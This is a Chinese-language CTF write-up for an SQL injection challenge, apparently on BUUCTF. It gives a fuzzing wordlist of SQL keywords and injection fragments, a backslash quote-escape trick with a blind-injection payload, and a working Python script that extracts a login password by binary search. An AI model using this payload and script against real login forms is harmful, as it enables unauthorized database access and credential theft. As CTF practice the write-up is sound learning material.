又开始刷SQL注入的题目,从这道简单注入下手
首先没找到提示。。。。。。最后看了一下wp才发现有个hint.txt
有后端语句比较好构造了,结果又过滤,要fuzz探测一下
发现select 还有 ' " 都被过滤了 幸好空格和反斜杠没有被过滤。。。。
fuzz.txt (可以自己添加)
select
from
ascii
substr
table
column
by
schema
where
extractvalue
exp
if
/
(
)
%
!
@
#
$
^
&
*
-
_
+
=
'
"
~
`
\
|
,
.
||
&&
order
updatexml
limit
And
Or
%23
%20
space
<
>
regex
group_concat
table_name
table_schema
column_name
database
imformation
union select
ascii(substr())
(select(group_concat(table_name))
from(information_schema.tables)where(table_schema=database())
(ascii(substr((select(group_concat(flaaag))from(flag)),%s,1))=%s)
where(table_schema=database())
学习来一下骚操作,本地环境下实验一下
在username = admin\ 可以把 单引号 ' 吃掉 并且在后面构造语句
而且给出了字段名可以直接爆破了,不给用select就是使用盲注了
如果构造成功 就会有stronger为回显(不知道为什么有时回显怪怪的,不过跑脚本就没有问题了)
payload:
username=admin\ password=or (ascii(substr(password,1,1))>0)#
上脚本,因为 = 号也被过滤了,只能用>,不能爆破,只能用二分法:
用bp插件 生成头部 ,可以去安装 加快自己写脚本速度
import requests
session = requests.Session()
def name():
name = ''
for j in range(20):
begin = 32
end = 128
tmp = (begin+end)//2
while begin<end:
paramsPost = {"password": "", "username": "admin\\"}
paramsPost['password'] = "or ascii(substr((password),{},1))>{} #".format(j + 1, tmp)
print(paramsPost)
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0",
"Referer": "http://8e55b398-4968-43ec-93fc-e0700c8f676d.node3.buuoj.cn/index.php",
"Connection": "close", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate", "DNT": "1", "Content-Type": "application/x-www-form-urlencoded"}
response = session.post("http://8e55b398-4968-43ec-93fc-e0700c8f676d.node3.buuoj.cn/index.php", data=paramsPost,
headers=headers)
if 'stronger' in response.text:
begin = tmp+1
tmp = (begin + end) // 2
else:
end = tmp
tmp = (begin + end) // 2
name += chr(tmp)
print(name)
name()
得到密码:
登录即可: